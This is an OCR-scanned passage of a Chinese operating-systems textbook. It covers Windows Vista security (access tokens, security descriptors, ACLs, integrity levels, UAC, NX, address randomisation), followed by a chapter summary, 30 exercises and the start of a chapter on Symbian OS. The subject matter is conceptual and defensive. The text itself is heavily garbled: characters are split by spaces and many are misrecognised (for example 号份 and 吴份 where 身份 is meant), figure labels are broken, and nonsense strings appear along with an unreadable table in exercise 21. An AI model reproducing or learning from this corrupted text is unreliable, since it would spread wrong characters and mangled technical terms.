利 ， 比 如 关机 和 访问 本 来 无 权 访问 的 文件 的 权利 。 实 际 上 ， 权 限 域 将 超 
级 用 户 的 权限 分 成 几 种 可 独立 赋予 进程 的 权限 。 这 样 ， 用 户 可 被 赋予 一 
些 超级 用 户 的 权限 ， 但 不 是 全 部 的 权限 。 总 之 ， 访 问 令 牌 表 示 了 谁 拥有 
这 个 进程 和 与 其 关联 的 权限 及 默认 值 。 


当 用 户 登 录 时 ，winlogon 赋 予 初始 的 进程 一 个 访问 令 牌 。 后 续 的 进 
程 一 般 会 将 这 个 令 牌 继承 下 去 。 初 始 时 ， 进 程 的 访问 令 牌 会 被 赋予 其 所 
有 的 线程 。 然 而 ， 线 程 在 运行 过 程 中 可 以 获得 一 个 不 同 的 令 牌 ， 在 这 种 
情况 下 ， 线 程 的 访问 令 牌 覆盖 了 进程 的 访问 令 牌 。 特 别 地 ， 一 个 客户 端 
线程 可 以 将 访问 权限 传递 给 服务 器 线程 ， 从 而 使 得 服务 器 可 以 访问 客户 
端的 受 保 护 的 文件 和 其 他 对 象 。 这 种 机 制 叫 做 号 份 模拟 
(impersonation) 。 它 是 由 传输 层 〈 比 如 ALPC、 命 名 管道 和 TCP/P ) 
实现 的 、 被 RPC 用 来 实现 从 客户 端 到 服务 器 的 通信 。 传 输 层 使 用 内 核 中 
安全 引用 监控 器 组 件 的 内 部 接口 提取 出 当前 线程 访问 令 牌 的 安全 上 下 
文 ， 并 把 它 传 送 到 服务 器 端 来 构建 用 于 服务 器 模拟 客户 吴 份 的 令 牌 。 








男 一 个 基本 的 概念 是 安全 描述 符 (security descriptor) 。 每 个 对 象 
都 关联 着 一 个 安全 描述 符 ， 该 摘 述 符 揪 述 了 谁 可 以 对 对 象 执行 何 种 操 
作 。 安 全 描述 符 在 对 象 被 创建 的 时 候 指定 。NTFS 文 件 系 统 和 注册 表 维 
护 厦 安全 描述 符 的 持久 化 形式 ， 用 以 为 文件 和 键 对 象 〈 对 象 管 理 右 中 表 





示 已 打开 的 文件 和 键 的 实例 ) 创建 安全 描述 符 。 


安全 描述 由 一 个 头 部 和 其 后 珊 有 一 个 或 多 个 访问 控制 入 口 〈Access 
Control Entry, ACE) 的 DACL 组 成 。ACE 主 要 有 两 类 : 允许 项 和 拒绝 
项 。 人 允许 项 含有 一 个 SID 和 一 个 表示 带 有 此 SID 的 进程 可 以 执行 哪些 操 
作 的 位 图 。 拒 绝 项 与 允许 项 相同 ， 不 过 其 位 图 表示 的 是 谁 不 可 以 执行 那 
些 操 作 。 比 如 ，Ida 拥 有 一 个 文件 ， 其 安全 描述 符 指定 任何 人 都 可 读 ， 
Elvis 不 可 访问 ，Cathy 可 读 可 写 ， 并 且 Ida 自 己 拥 有 完全 的 访问 权限 。 图 
11-48 描 述 了 这 个 简单 的 例子 。Everyone 这 个 SID 表 示 所 有 的 用 户 ， 但 该 
表 项 会 被 任何 显 式 的 ACE 宪 盖 。 














安全 描述 符 


SOF 











a | 


[Marilyn | 
111111 


安全 描述 符 


lace 





























bce 


图 11-48 文件 的 安全 描述 符 示 全 


除 DACL 外 ， 安 全 描述 符 还 包含 一 个 系统 访问 控制 列表 (System 
Access Control List, SACL) 。SACL 跟 DACL 很 相似 ， 不 过 它 表示 的 并 
不 是 谁 可 以 使 用 对 象 ， 而 是 哪些 对 象 访问 操作 会 被 记录 在 系统 范围 内 的 
安全 事件 日 志 中 。 在 图 11-48 中 ，Marilyn 对 文件 执行 的 任何 操作 都 将 会 
被 记录 。SACL 还 包含 完整 度 级 别 字段 ， 我 们 将 稍 后 讨论 它 。 


11.9.2 ”安全 相关 的 API 调 用 


Windows Vista 的 访问 控制 机 制 大 都 基于 安全 描述 符 。 通 常情 况 下 进 
程 创建 对 象 时 会 将 一 个 安全 描述 符 作 为 参数 提供 给 CreateProcess、 
CreateFile 或 者 其 他 对 象 创建 调用 。 该 安全 描述 符 就 会 附属 在 这 个 对 象 
上 ， 融 如 在 图 11-48 中 看 到 的 那样 。 如 果 没 有 给 创建 对 象 的 函数 调用 提 
供 安全 描述 符 ， 调 用 者 的 访问 令 牌 中 默认 的 安全 设置 (参见 图 11-47) 
将 被 使 用 。 


大 部 分 Win32 API 安 全 调用 跟 安 全 描述 符 的 管理 相关 ， 因 此 在 这 里 
主要 关注 它们 。 图 11-49 列 出 了 那些 最 重要 的 调用 。 为 了 创建 安全 描述 
符 ， 首 先 要 分 配 存储 空间 ， 然 后 调用 Initialize Security Descriptor 初 始 化 
它 。 该 调用 填充 了 安全 描述 符 的 头 部 。 如 果 不 知 道 所 有 者 的 SID， 可 以 
根据 名 字 用 LookupAccountSid 来 查询 。 随 后 SID 被 插入 到 安全 描述 符 
中 。 对 组 SID 也 一 样 ， 如 果 有 的 话 。 通 常 ， 这 些 SID 会 是 调用 者 自己 的 
SID 和 它 的 某 一 个 组 SID， 不 过 系统 管理 员 可 以 填充 任何 SID。 


















Win32 API 函数 
InitializeSecurityDescriptor 


SetSecurityDescriptorOwner 
InitializeAcl 


AddAccessAllowedAce 
AddAccessDeniedAce 
DeleteAce 


SetSecurityDescriptorDacl 


图 11-49 Win32 中 基本 的 安全 调用 










准备 一 个 新 的 安全 描述 符 
查询 指定 用 户 名 的 SID 
设置 安全 描述 符 中 的 所 有 者 的 SID 
设置 安全 描述 符 中 的 组 SID 

初始 化 DACL 或 者 SACL 

向 DACL 或 者 SACL 添 加 一 个 允许 访问 的 新 ACE 
向 DACL 或 者 SACL 添 加 一 个 拒绝 访问 的 新 ACE 
从 DACL 或 者 SACL 删 除 ACE 
使 DACL 依 附 到 一 个 安全 描述 符 































































这 时 可 调用 InitializeAcl 初 始 化 安全 描述 符 的 DACL (或 者 
SACL) 。ACL 入 口 项 可 通过 AddAccess AllowedAce 和 
AddAccessDeniedAce。 可 多 次 调用 这 些 函 数 以 添加 任何 所 需 的 ACE 入 口 
项 。 可 调用 DeleteAce 来 删除 一 个 入 口 项 ， 这 用 来 修改 已 存在 的 ACL 而 
不 是 构建 一 个 新 的 ACL。SetSecurity DescriptorDacl 可 以 把 一 个 准备 就 绪 
的 ACL 与 安全 描述 符 关 联 到 一 起 。 最 后 ， 当 创建 对 象 时 ， 可 将 新 构造 的 
安全 描述 符 作 为 参数 传送 使 其 与 这 个 对 象 相关 联 。 





11.9.3 ”安全 性 的 实现 


在 独立 的 Windows Vista 系 统 中 ， 安 全 由 大 量 的 组 件 来 实现 ， 我 们 已 
经 看 过 了 其 中 大 部 分 组 件 ( 网 络 是 完全 不 同 的 事情 ， 超 出 了 本 书 的 讨论 
范围 ) 。 登 录 和 认证 分 别 由 winlogon 和 lsass 来 处 理 。 登 录 成 功 后 会 获得 
一 个 带 有 访问 令 牌 的 GUI shell 程 序 (explorer.exe) 。 这 个 进程 使 用 注册 
表 中 的 SECURITY 和 SAM 表 项 。 前 者 设置 一 般 性 的 安全 策略 ， 而 后 者 包 
含 了 针对 个 别 用 户 的 安全 信息 ， 如 11.2.3 节 讨论 的 那样 。 





一 旦 用 户 登 录 成 功 ， 每 当 打 开 对 象 进行 访问 就 会 触发 安全 操作 。 每 
次 OpenXXX 调 用 都 需 提 供 正 要 被 打开 的 对 象 的 名 字 和 所 需 的 权限 集 
合 。 在 打开 的 过 程 中 ， 安 全 引用 监控 器 会 检查 调用 者 是 否 拥 有 所 需 的 权 
限 。 它 通过 检查 调用 者 的 访问 令 牌 和 跟 对 象 关联 的 DACL 来 执行 这 种 检 
但。 安全 监控 管理 器 依次 检查 ACL 中 的 每 个 ACE。 一 旦 发 现 入 口 项 与 调 
用 者 的 SID 或 者 调用 者 所 隶属 的 某 个 组 相 匹 配 ， 访 问 权 限 即 可 确定 。 如 
果 调 用 者 拥有 所 需 的 权限 ， 则 打开 成 功 ， 否 则 打开 失败 。 


正如 已 经 看 到 的 那样 ， 除 允许 项 外 ，DACL 还 包括 拒绝 项 。 因 此 ， 
通常 把 ACL 中 的 拒绝 访问 的 项 置 于 赋予 访问 权限 的 项 之 面 ， 这 样 一 个 被 
特意 拒绝 访问 的 用 户 不 能 通过 作为 拥有 合法 访问 权限 的 组 的 成 员 这 样 的 
后 门 获得 访问 权 。 











对 象 被 打开 后 ， 调 用 者 会 获得 一 个 句柄 。 在 后 续 的 调用 中 ， 只 需 检 
伍 尝 试 的 操作 是 否 在 打开 时 所 申请 的 操作 集合 内 ， 这 样 就 避免 了 调用 者 
为 了 读 而 打开 文件 然后 对 该 文件 进行 写 操作 。 太 外 ， 正 如 SACL 所 要 求 
的 那样 ， 在 句柄 上 进行 的 调用 可 能 会 导致 产生 审计 日 志 。 


Windows Vista 增 加 了 另外 的 安全 设施 来 应 对 使 用 ACL 保 护 系统 的 共 
同 问题 。 进 程 的 令 牌 中 含有 新 增加 的 必需 的 完整 性 级 别 〈Integrity- 
Level) SID 字 段 并 且 对 象 在 SACL 中 指定 了 一 个 完整 性 级 别 ACE。 完 整 
性 级 别 阻 止 了 对 对 象 的 写 访 问 ， 不 管 DACL 中 有 何 种 ACE。 特 别 地 ， 完 
整 性 级 别 方案 用 来 保护 系统 免 受 被 攻击 者 控制 的 Internet Explorer 进 程 
《可 能 用 户 接受 了 不 妥 的 建议 而 从 未 知 的 网 站 下 载 代码 ) 的 破坏 。 低 权 
限 的 下 ， 运 行 时 的 完整 性 级 别 被 设置 为 低 。 系 统 中 所 有 的 文件 和 注册 表 
中 的 键 拥有 中 级 的 完整 性 级 别 ， 因 此 低 完 整 性 级 别 的 正 不 能 修改 它们 。 





近年 来 Windows 增 加 了 很 多 其 他 的 安全 特性 。 对 于 Windows XP 
Service Pack 2 来 说 ， 系 统 的 大 部 分 在 编译 时 使 用 了 可 对 多 种 栈 缓冲 区 溢 
出 漏洞 进行 验证 的 选项 UGS) 。 另 外 ， 在 AMD64 体 系 结构 中 一 种 叫做 
NX 的 设施 可 限制 执行 栈 上 的 代码 。 即 使 在 x86 模 式 下 处 理 器 中 的 NX 位 
也 是 可 用 的 。NX 代 表 不 可 执行 (no execute) ， 它 可 以 给 页 面 加 上 标记 
使 得 其 上 的 代码 不 能 被 执行 。 这 样 ， 即 使 攻击 者 利用 缓冲 区 溢出 漏洞 向 
进程 插入 代码 ， 跳 转 到 代码 处 开始 执行 也 不 是 一 件 容易 的 事情 。 


Windows Vista 引 入 了 更 多 的 安全 特性 来 阻止 攻击 者 。 加 载 到 内 核 态 


的 代码 要 经 过 检查 〈 这 在 x64 系 统 中 是 默认 的 ) 并 且 只 有 被 正确 签名 的 
代码 才 可 以 被 加 载 。 在 每 个 系统 中 ，DLL 和 EXE 的 加 载 地 址 连同 栈 分 配 
的 地 址 都 经 过 了 有 意 的 混 排 ， 这 使 得 攻击 者 不 太 可 能 利用 绥 冲 区 溢出 漏 
洞 跳 转 到 一 个 众所周知 的 地 址 然后 执行 一 段 被 特意 编排 的 可 获得 权限 提 
升 的 代码 。 会 有 更 小 比例 的 系统 受到 依赖 于 标准 地 址 处 的 二 进 制 数据 的 
攻击 。 在 受到 攻击 时 系统 更 加 可 能 只 是 骨 溃 掉 ， 将 一 个 潜在 的 权限 升级 
攻击 转化 为 危险 性 更 小 的 拒绝 服务 攻击 。 








在 微软 公司 称 为 用 户 账 户 控制 (User Account Control, UAC) 的 引 
入 是 另 一 个 改变 。 这 用 来 解决 大 部 分 用 户 以 管理 员 身 份 运行 系 统 这 个 长 
期 的 问题 。Windows 的 设计 并 不 需要 用 户 以 管理 员 身 份 使 用 系统 ， 但 在 
很 多 发 布 版 本 中 对 此 问题 的 忽视 使 得 如 果 你 不 是 管理 员 就 不 可 能 顺利 地 
使 用 Windows。 始 终 以 管理 员 吴 份 使 用 系统 是 危险 的 。 用 户 的 错误 会 轻 
易 地 毁坏 系统 ， 而 且 如 果 用 户 由 于 某 种 原因 被 欺骗 或 攻击 了 而 去 运行 
能 危害 系统 的 代码 ， 这 些 代 码 将 拥有 管理 员 的 访问 权限 并 且 可 能 会 把 其 
自 寻 深 深 埋藏 在 系统 中 。 














如 果 有 UAC， 当 尝试 执行 需要 管理 员 访 问 权 限 的 操作 时 ， 系 统 会 
示 一 个 重 辣 的 特殊 桌面 并 且 接 管控 制 权 ， 使 得 只 有 用 户 的 输入 可 以 授权 
这 次 访问 (与 C2 安全 中 CTRL-ALT-DEL 的 工作 方式 类 似 )。 当 然 ， 攻 
击 者 不 需要 成 为 管理 员 也 可 以 破坏 用 户 所 真正 关心 的 ， 比 如 他 的 个 人 文 
件 。 但 UAC 确 实 可 阻止 现 有 类 型 的 攻击 ， 并 且 如 果 攻 击 者 不 能 修改 任何 








系统 数据 或 文件 ， 那 受 损 的 系统 恢复 起 来 也 比 容易 。 





Windows Vista 中 最 后 的 一 个 安全 特性 已 经 提 到 过 了 。 这 就 是 对 具有 
安全 边界 的 受 保护 进程 (protected process) 的 支持 。 通 常 ， 在 系统 中 用 
户 〈《 由 令 牌 对 象 代表 ) 定义 了 权限 的 边界 。 创 建 进程 后 ， 用 户 可 通过 任 
意 数 目的 内 核 设 施 来 访问 进程 以 进行 进程 创建 、 调 试 、 获 取 路 径 名 和 线 
程 注 入 等 。 受 保护 进程 关 挥 了 用 户 的 访问 权限 。 这 个 设施 在 Vista 中 的 唯 
一 用 处 就 是 允许 数字 版 权 管 理 软件 更 好 地 保护 内 容 。 对 受 保 护 进程 的 使 
用 在 未 来 的 发 布 版 本 中 可 能 会 用 于 对 用 户 更 加 友好 的 目的 ， 比 方 说 保护 
系统 以 应 对 攻击 者 而 不 是 保护 内 容 免 受 系统 所 有 者 的 攻击 。 








由 于 世界 范围 内 越 来 越 多 的 针对 Windows 系 统 的 攻击 ， 近 年 来 微软 
公司 加 大 了 提高 Windows 安 全 性 的 努力 。 其 中 某 些 攻击 非常 成 功 ， 使 得 
整个 国家 和 主要 公司 的 计算 机 都 宕 掉 了 ， 导 致 了 数 十 亿美 元 的 损失 。 这 
些 攻击 大 都 利用 了 编码 中 的 小 错误 ， 这 些 错 误 可 导致 缓冲 区 溢出 ， 从 而 
使 得 攻击 者 可 以 通过 重 写 返回 地 址 、 异 常 处 理 指 针 和 其 他 数据 来 控制 程 
序 的 执行 。 使 用 类 型 安全 的 语言 而 不 是 C 和 C++ 可 避免 许多 此 类 的 问 
题 。 即 使 使 用 这 些 不 安全 的 语言 ， 如 果 让 学 生 更 好 地 理解 参数 和 数据 验 
证 中 的 陷阱 ， 许 多 漏洞 也 可 以 避免 。 毕 竟 ， 许 多 在 Microsoft 编 写 代码 的 
软件 工程 师 在 几 年 前 也 还 是 学 生 ， 就 像 正 在 阅读 此 实例 研究 的 你 们 中 的 
许多 人 一 样 。 有 许多 关于 在 基于 指针 的 语言 中 可 被 利用 的 编码 上 的 小 错 
误 的 类 型 以 及 怎样 避免 的 书籍 (比如 ，Howard 和 LeBlank，2007) 。 











11.10 小结 


Windows Vista 中 的 内 核 态 由 HAL、NTOS 的 内 核 和 执行 体 层 以 及 大 
量 实现 了 从 设备 服务 到 文件 系统 、 从 网 络 到 图 形 的 设备 驱动 程序 组 成 。 
HAL 对 其 他 组 件 隐藏 了 硬件 上 的 某 些 差别 。 内 核 层 管理 CPU 以 文 持 多 线 
程 和 同步 ， 执 行 体 实现 大 多 数 的 内 核 态 服务 。 


执行 体 基于 内 核 态 的 对 象 ， 这 些 对 象 代表 了 关键 的 执行 体 数 据 结 
构 ， 包 括 进 程 、 线 程 、 内 存 区 、 驱 动 程序 、 设 备 以 及 同步 对 象 等 。 用 户 
进程 通过 调用 系统 服务 来 创建 对 象 并 获得 句柄 的 引用 以 用 于 后 续 对 执行 
体 组 件 的 调用 。 操 作 系 统 也 创建 一 些 内 部 对 象 。 对 象 管理 需 维 护 者 一 个 
名 字 空 间 ， 对 象 可 以 插入 该 名 字 空 间 以 备 后 续 的 查询 。 





Windows 系 统 中 最 重要 的 对 象 是 进程 、 线 程 和 内 存 区 。 进 程 拥 有 虚 
拟 地 址 空间 并 且 是 资源 的 容器 。 线 程 是 执行 的 单元 并 被 内 核 层 使 用 优先 
级 算法 调度 执行 ， 该 优先 级 算法 使 优先 级 最 高 的 束 绪 线程 总 在 运行 ， 并 
且 如 有 必要 可 抢占 低 优 先 级 线程 。 内 存 区 表示 可 以 映射 到 进程 地 址 空间 
的 像 文件 这 样 的 内 存 对 象 。EXE 和 DLL 等 程序 映像 用 内 存 区 来 表示 ， 就 
BRENTE. 


Windows 文 持 按 需 分 页 虚拟 内 存 。 分 页 算法 基于 工作 集 的 概念 。 系 
统 维护 着 儿 种 类 型 的 页 面 列表 来 优化 内 存 的 使 用 。 这 些 页 面 列表 是 通过 


调整 工作 集 来 填充 的 ， 调 整 过 程 使 用 了 复杂 的 规则 试图 重用 在 长 时 间 内 
没有 被 引用 的 物理 页 面 。 绥 存 管 理 器 管理 内 核 中 的 虚拟 地 址 并 用 它 将 文 
件 映 射 到 内 存 ， 这 提高 了 许多 应 用 程序 的 IO 性 能 ， 因 为 读 操 作 不 用 访 
问 磁盘 就 可 被 满足 。 





设备 驱动 程序 遵循 Windows 驱 动 程序 模型 ， 并 执行 输入 /输出 。 每 个 
驱动 程序 开始 先 初 始 化 一 个 驱动 程序 对 象 ， 该 对 象 含有 可 被 系统 调用 以 
操控 设备 的 过 程 的 地 址 。 实 际 的 设备 用 设备 对 象 来 代表 ， 设 备 对 象 可 以 
根据 系统 的 配置 描述 来 创建 ， 或 者 由 即 插 即 用 管理 器 按照 它 在 枚 举 系统 
总 线 时 所 发 现 的 设备 创建 。 设 备 组 织 成 一 个 栈 ，LIO 请 求 包 沿 着 栈 向 下 
传递 并 被 每 个 设备 的 驱动 程序 处 理 。1/O 具 有 内 在 的 异步 性 ， 驱 动 程序 
程序 通常 将 请 求 排队 以 便 后 续 处 理 然 后 返回 到 调用 者 。 文 件 系 统 卷 作为 
IO 系统 中 的 设备 实现 。 





NTFS 文 件 系 统 基 于 一 个 主 文件 表 ， 每 个 文件 或 者 目录 在 表 中 有 一 
条 记录 。NTES 文 件 系 统 的 所 有 元 数据 本 身 是 NTFS 文 件 的 一 部 分 。 每 个 
文件 含有 多 个 属性 ， 这 些 属性 或 存储 在 MET 记 录 中 或 者 不 在 其 中 〈 存 储 
在 MFT 外 部 的 块 中 ) 。 除 此 之 外 ，NTFS 还 支持 Unicode、 压 缩 、 日 志和 


加 密 等 。 








最 后 ，Windows Vista 拥 有 一 个 基于 访问 控制 列表 和 完整 性 级 别 的 成 
熟 的 安全 系统 。 每 个 进程 带 有 一 个 令 牌 ， 此 令 牌 表示 了 用 户 的 标识 和 进 
程 所 具有 的 特殊 权限 。 每 个 对 象 有 一 个 与 其 相关 联 的 安全 描述 符 。 安 全 





描述 符 指 向 一 个 目 主 访问 控制 列表 ， 该 列表 中 包含 允许 或 者 拒绝 个 体 或 
者 组 访问 的 访问 控制 入 口 项 ，Windows 在 最 近 的 发 行 版 本 中 增加 了 大 量 
的 安全 特性 ， 包 括 用 BitLocker 来 加 密 整 个 卷 ， 采 用 地 址 空间 随机 化 ， 不 
可 执行 的 堆栈 以 及 其 他 措施 使 得 缓冲 区 溢出 攻击 更 加 困难 。 


习题 


1.HAL 可 以 跟踪 从 1601 年 开始 的 所 有 时 间 。 举 一 个 例子 ， 说 明 这 项 
功能 的 用 途 。 


2. 在 11.3.2 节 ， 我 们 介绍 了 在 多 线程 应 用 程序 中 一 个 线程 关闭 了 名 
柄 而 另 一 个 线程 仍然 在 使 用 它们 所 造成 的 问题 。 解 决 此 问题 的 一 种 可 能 
性 是 插入 序列 域 。 请 问 该 方法 是 如 何 起 作用 的 ? 需要 对 系统 做 哪些 修 

3.Win32 系 统 没 有 信和 号 功能 。 如 果 要 引入 此 功能 ， 我 们 可 以 将 信和 号 
设置 为 进程 所 有 ， 线 程 所 有 ， 两 者 都 有 或 者 两 者 都 没有 。 试 着 提出 一 项 
建议 ， 并 解释 为 什么 。 











4. 另 一 种 使 用 DLL 的 方式 是 静态 地 将 每 个 程序 链接 到 它 实际 调用 到 
那些 库 函 数 ， 既 不 多 也 不 少 。 在 客户 端 机 器 或 者 服务 器 机 器 上 引入 此 方 
法 ， 哪 个 更 合理 ? 


5. 在 Windows 中 线程 拥有 独立 的 用 户 态 栈 和 内 核 态 栈 的 原因 是 哪 


6.TLB 对 性 能 有 重大 的 影响 。 为 了 提高 TLB 的 有 效 性 ，Windows 使 


用 了 大 小 为 4MB 的 页 ， 这 是 什么 ? 


7. 在 一 个 执行 体 对 象 上 可 定义 的 不 同 操作 的 数量 有 没有 限制 ? 如 果 
有 ， 这 个 限制 从 何 而 来 ? 如 果 没 有 ， 请 说 明 为 什么 。 


8.Win32 API 的 调用 WaitForMnultipleObjects 以 一 组 同步 对 象 的 句柄 为 
参数 ， 使 得 线程 被 这 组 同步 对 象 阻 塞 。 一 旦 它们 中 的 任何 一 个 收 到 信 
号 ， 调 用 者 线程 就 会 被 释放 。 这 组 同步 对 象 是 否 可 以 包含 两 个 信号 灯 、 
一 个 互 斥 体 和 一 个 临界 区 ? 理由 是 什么 ? 提示 :这 不 是 一 个 恶作剧 的 问 
题 ， 但 确实 有 必要 认真 考虑 一 番 。 


9. 给 出 三 个 可 能 会 终止 线程 的 原因 。 


10. 如 11.4 节 所 述 ， 有 一 个 特殊 的 句柄 表 用 于 为 进程 和 线程 分 配 ID。 
句柄 表 的 算法 通常 是 分 配 第 一 个 可 用 的 句柄 《按照 后 进 先 出 的 顺序 维护 
空闲 链表 ) 。 在 最 新 发 布 的 Windows 版 本 中 ， 该 算法 变 成 了 ID 表 总 是 以 
先进 先 出 的 顺序 跟踪 空闲 链表 。 使 用 后 进 先 出 顺序 分 配 进程 线 ID 有 什么 


潜在 的 问题 ? 为 什么 .UX 操作 系统 没有 这 个 问题 ? 


11. 假 设 时 间 方 配额 被 设置 为 20 曼 秒 ， 当 前 优先 级 为 24 的 线程 在 配 
额 开始 的 时 候 刚 开始 执行 。 突 然 一 个 IO 操作 完成 了 并 且 一 个 优先 级 为 
28 的 线程 变 成 就 绪 状 态 。 这 个 线程 需要 等 竺 多 久 才 可 以 使 用 CPU? 





12. 在 Windows Vista 中 ， 当 前 的 优先 级 总 是 大 于 或 等 于 基本 的 优先 
级 。 是 否 在 茶 些 情况 下 当前 的 优先 级 低 于 基本 的 优先 级 也 是 有 意义 的 ? 
AA, Sh). ARAL. 


13. 在 Windows 中 很 容易 实现 一 些 设施 将 运行 在 内 核 中 的 线程 临时 依 
附 到 其 他 进程 的 地 址 空间 。 为 什么 在 用 户 态 却 很 难 实现 ? 这 样 做 有 何 目 
的 ? 











14. 即 使 有 很 多 空 几 的 可 用 内 存 而 且 内 存 管理 器 也 不 需要 调整 工作 
集 ， 分 页 系统 仍然 会 经 常 对 磁盘 进行 写 操作 。 为 什么 ? 











15. 为 什么 用 来 访问 进程 页 目录 和 页 表 的 物理 页 面 的 自身 映射 数据 
总 是 占用 同一 片 4MB 的 内 核 虚 拟 地 址 空间 (在 x86 上 )? 





16. 如 果 保 留 了 一 段 虚拟 地 址 空间 但 是 没有 提交 它 ， 你 认为 系统 会 
为 其 创建 一 个 VAD 吗 ?请 证 明 你 的 答案 。 


17. 在 图 11-36 中 ， 哪 些 转 移 是 由 全 略 决 定 的 ， 而 不 是 由 系统 事件 
(例如 ， 一 个 进程 退出 并 释放 其 页 面 ) 所 强迫 的 转移 ? 


18. 假 设 一 个 页 面 被 共享 并 且 同 时 存在 于 两 个 工作 和 集中。 如 果 它 从 
一 个 工作 集 移出 ， 在 图 11-36 中 它 将 会 到 哪里 去 ? 当 它 从 第 二 个 工作 集 
移出 时 会 发 生 什 么 ? 


19. 当 进程 取消 对 一 个 页 面 的 映射 时 ， 干 净 的 页 会 进行 图 11-36 中 的 
转移 〈5) ， 那 脏 的 栈 页 怎样 处 理 呢 ?为 什么 脏 的 栈 页 面 被 取消 映射 时 
不 会 被 转移 到 已 修改 列表 中 呢 ? 


20. 假 设 一 个 代表 茶 种 类 型 互 斥 锁 〈 比 如 互 斥 对 象 ) 的 分 发 对 象 被 





标记 为 使 用 通知 事件 而 不 是 同步 事件 来 声明 锁 被 释放 。 为 什么 这 样 是 不 
好 的 ? 你 的 回答 在 多 大 程度 上 依赖 于 锁 被 持 有 的 时 间 、 时 间 卢 配额 的 长 
度 和 系统 是 否 为 多 处 理 器 的 ? 


21. 一 个 文件 存在 如 下 映射 。 请 给 出 MEFIT 的 行 串 。 


偏 移 ~vi 2 3 = & © 7 R & wo 
位 可 地 址 50 51 52 


22. 考 虑 图 11-43 中 的 MEFT 记 录 。 假 设 该 文件 增长 了 并 且 在 文件 的 末 
尾 添加 了 第 10 个 块 。 新 块 的 序号 是 66。 现 在 MFT 记 录 会 是 什么 样子 ? 


23. 在 图 11-46b 中 ， 最 先 的 两 个 行 串 的 长 度 都 为 8 个 块 。 你 觉得 它们 
长 度 相 等 只 是 偶然 的 ， 还 是 跟 压 缩 的 工作 方式 有 关 ? 请 解释 理由 。 


24. 假 如 您 想 创 建 Windows Vista 的 精简 版 。 在 图 11-47 中 可 以 取消 哪 
些 字 段 而 不 削弱 系统 的 安全 性 ? 


25. 由 许多 程序 (Web 浏览 器 、oOffice、COM 服 务 器 ) 使 用 的 一 个 扩 
展 模型 是 对 程序 所 包含 的 DLL 添加 钩子 函数 来 扩展 其 底层 功能 。 只 要 在 
加 载 DLL 前 仔细 模拟 客户 的 身份 ， 该 模型 对 基于 RPC 的 服务 来 说 就 是 合 
理 的 ， 是 这 样 的 吗 ? 为 什么 不 是 ? 





26. 在 NUMA 机 器 上 ， 不 管 何 时 Windows 内 存 管理 器 需要 分 配 物 理 内 


存 来 处 理 页 面 失效 ， 它 总 答 试 从 当前 线程 的 理想 的 处 理 圳 的 NUMA 节 氮 
中 获取 。 为 什么 ? 如 果 线 程 正 运行 在 其 他 处 理 右 上 呢 ? 


27. 系 统 肝 涡 时 ， 应 用 程序 可 以 轻易 地 从 基于 卷 的 影子 副本 的 备份 
中 恢复 ， 而 不 是 从 磁盘 状态 中 恢复 。 请 给 出 几 个 这 样 的 例子 。 








28. 在 某 些 情况 下 为 了 满足 安全 性 的 要 求 需要 为 进程 提供 全 零 的 页 
面 ， 在 11.9 市 中 向 进程 的 堆 提 供 内 存 就 是 这 样 的 一 种 情况 。 请 给 出 一 个 
或 者 多 个 其 他 需要 对 页 面 清 零 的 虚拟 内 存 操作 。 





29. 在 当前 所 有 的 Windows 发 行 版 本 中 ，regedit 命 令 可 用 于 导出 部 分 
或 全 部 注册 表 到 一 个 文本 文件 。 在 一 次 工作 会 话 中 保存 注册 表 厦 干 次 ， 
看 看 有 什么 变化 。 如 果 您 能 够 在 Windows 中 安装 软件 或 硬件 ， 请 找 出 安 
装 或 好 载 程序 或 设备 时 注册 表 有 何 变 化 。 


30. 写 一 个 UNIX 程 序 ， 模 拟 用 多 个 流 来 写 一 个 NTFS 文 件 。 它 应 能 接 
受 一 个 或 多 个 文件 作为 参数 ， 并 创建 一 个 输出 文件 ， 该 文件 的 一 个 流 包 
含 所 有 参数 的 属性 ， 其 他 的 流 包含 每 个 参数 的 内 容 。 然 后 再 写 一 个 程序 
来 报告 这 些 属性 和 流 并 提取 出 所 有 的 组 成 成 分 。 


第 12 章 ”实例 研究 3: Symbian 操作 系统 


在 前 面 的 两 章 里 ， 我 们 已 经 介绍 了 两 种 在 台式 机 以 及 笔记 本 电脑 上 
通用 的 操作 系统 ，Linux 以 及 Windows Vista。 但 实际 上 ， 超 过 90% 的 
CPU 都 并 非 用 于 台式 机 或 笔记 本 电脑 ， 而 是 用 于 骨 入 式 系统 ， 例 如 手 
机 、PDA、 数 码 相 机 、 便 携 式 摄像 机 、 游 戏 机 、iPod、MP3 播 放 器 、CD 
播放 器 、DVD 刻 录 机 、 无 线路 由 器 、 电 视 机 、GPS 接 收 器 、 激 光 打 印 
机 、 汽 车 ， 以 及 其 他 许多 消费 产品 。 它 们 大 多 使 用 现代 的 32 位 或 64 位 蕊 
片 ， 几 乎 全 部 安装 有 成 熟 的 操作 系统 。 但 是 很 少 有 人 意识 到 这 些 操作 系 
统 的 存在 。 在 这 一 章 里 ， 我 们 将 研究 供 入 式 系统 中 十 分 通用 的 一 个 操作 
系统 : Symbian 操作 系统 。 








Symbian 操作 系统 是 一 个 运行 在 一 些 广 商 的 智能 手机 平台 上 的 操作 
系统 。 智 能 手机 因 其 运行 功能 齐全 的 操作 系统 以 及 利用 台式 机 的 特性 而 
得 名 。Symbian 操 作 系 统 用 来 作为 很 多 厂商 的 多 种 智能 手机 的 基础 ， 通 
过 精心 设计 ， 专 门 运行 在 智能 手机 平台 上 ， 即 那些 CPU、 内 存 以 及 存储 
容量 有 限 、 主 要 针对 通信 的 通用 计算 机 。 





针对 Symbian 操作 系统 的 探讨 将 从 它 的 历史 开始 。 随 后 给 出 这 个 系 
统 的 概况 ， 大 致 介绍 它 是 怎样 设计 的 以 及 实现 什么 样 的 功能 。 然 后 如 前 
两 章 那 样 ， 介 绍 Symbian 操 作 系统 设计 的 各 个 方面 ， 包 括 进 程 、 内 存 管 
理 、/O、 文 件 系 统 以 及 安全 性 。 最 后 介绍 Symbian 操 作 系 统 怎样 处 理 知 


能 手机 中 的 通信 问题 。 


12.1 Symbian 操作 系统 的 历史 





UNIX 操 作 系统 有 着 很 长 的 历史 ， 几 乎 与 计算 机 一 样 的 久远 。 
Windows 操 作 系统 也 有 较 长 的 历史 。 而 Symbian 操作 系统 的 历史 相对 较 
短 。 筷 起 源 于 20 世 纪 90 年 代 研 用 的 操作 系统 ， 首 次 出 现 则 有 是 在 2001 年 。 
鉴于 Symbian 操作 系统 所 依赖 的 乔 能 手机 平台 也 是 近期 才 得 到 发 展 的 ， 
这 一 点 应 当 并 不 令 人 惊讶 。 


